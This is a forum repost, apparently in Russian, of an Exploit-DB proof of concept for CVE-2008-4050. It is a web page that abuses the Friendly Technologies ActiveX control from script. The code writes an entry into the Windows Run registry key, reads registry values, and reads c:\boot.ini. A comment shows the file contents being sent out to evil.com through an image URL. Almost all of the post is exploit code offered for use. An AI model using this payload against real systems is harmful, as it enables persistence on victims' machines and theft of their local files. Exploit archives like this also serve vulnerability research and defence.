Exploit Friendly Technologies - Read/Write Registry/Read Files

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6334
Проверка EDB
  1. Пройдено
Автор
SPDR
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2008-4050
Дата публикации
2008-08-30
HTML:
<!-- 
Proof of Concept...
Read write to registry
and also read files

More codes at irc.nix.co.il/#binaryvision !
-->

<html>
<title>Friendly Technologies - Read/Write Registry</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id='FT'></object>

<script language='Javascript'>
// Write to Registry
FT.RegistryValue (1, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Key Name Here", 1) = "Input Here";

// Read from Registry
var readreg = FT.RegistryValue (1, "SOFTWARE\\Friendly Technologies\\FriendlyWeb Dialer", "Version", 1);
alert(readreg);

// Read from file
var readme=FT.GetTextFile("c:\\boot.ini");
alert(readme); // <img src="http://evil.com/postfiles.php?input="+readme ...
</script>

# milw0rm.com [2008-08-30]
 
Источник
www.exploit-db.com

Похожие темы